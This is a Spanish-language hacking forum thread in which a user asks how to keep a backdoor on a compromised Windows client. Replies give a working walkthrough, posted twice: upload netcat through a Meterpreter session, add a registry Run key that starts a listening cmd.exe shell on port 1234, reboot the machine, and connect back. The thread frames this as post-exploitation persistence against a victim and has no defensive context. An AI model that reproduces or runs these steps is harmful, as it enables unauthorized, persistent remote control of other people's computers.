[SOLUCIONADO] Subir backdoors a un cliente Windows

Iniciado por Rocky91, Junio 05, 2013, 01:10:55 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 05, 2013, 01:10:55 PM Ultima modificación: Agosto 08, 2014, 08:21:47 PM por Expermicid
Hola a todos.

Tengo una pequeña duda, y es una vez dentro de la maquina a traves de un exploit, ¿a una maquina cliente de Windows, como le subo la backdoors?

A un servidor si es linux o Windows se que lo puedo subir por wget (Linux) ftp o tftp (Windows o linux).

¿Pero cliente Windows?

Si lanzas el exploit supongo que lo hiciste desde metasploit, si es el caso revisa sobre los Payload lo cual puedes hacer uso de una shell la cual te dara con una sesion de meterpreter y a ello ya haz volar tu imaginación.

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si lanzas el exploit supongo que lo hiciste desde metasploit, si es el caso revisa sobre los Payload lo cual puedes hacer uso de una shell la cual te dara con una sesion de meterpreter y a ello ya haz volar tu imaginación.

Regards,
Snifer

Sí, me lo he imaginao, pero supongo que al cabo de un rato el firewall me echara, o en el caso cuando pase el tiempo, se pondrá el parche a ese agujero de seguridad y no podre volver a acceder.

Saludos

Te pasteo desde q se abre la sesión con meterpreter:



Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >
Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.



meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.

meterpreter > Así:


meterpreter > upload C:\\Windows\\System32\\nc.exe C:\\Windows\\System32\\
uploading : C:\Windows\System32\nc.exe -> C:\Windows\System32\
uploaded : C:\Windows\System32\nc.exe -> C:\Windows\System32\\nc.exe
meterpreter > Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:


HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run


Asi:



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter > Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:



meterpreter > reboot
Rebooting...
meterpreter >Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:



msf > connect 192.168.0.3 1234
Connected to 192.168.0.3:1234


fuente: shellsecurity

Junio 06, 2013, 12:57:31 PM #4 Ultima modificación: Junio 06, 2013, 12:59:26 PM por Rocky91
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Te pasteo desde q se abre la sesión con meterpreter:



Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >
Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.



meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.

meterpreter > Así:


meterpreter > upload C:\\Windows\\System32\\nc.exe C:\\Windows\\System32\\
uploading : C:\Windows\System32\nc.exe -> C:\Windows\System32\
uploaded : C:\Windows\System32\nc.exe -> C:\Windows\System32\\nc.exe
meterpreter > Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:


HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run


Asi:



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter > Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:



meterpreter > reboot
Rebooting...
meterpreter >Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:



msf > connect 192.168.0.3 1234
Connected to 192.168.0.3:1234


fuente: shellsecurity


Ooohhhhh he visto la luz :o ¡Gracias! ::) :P

Saludos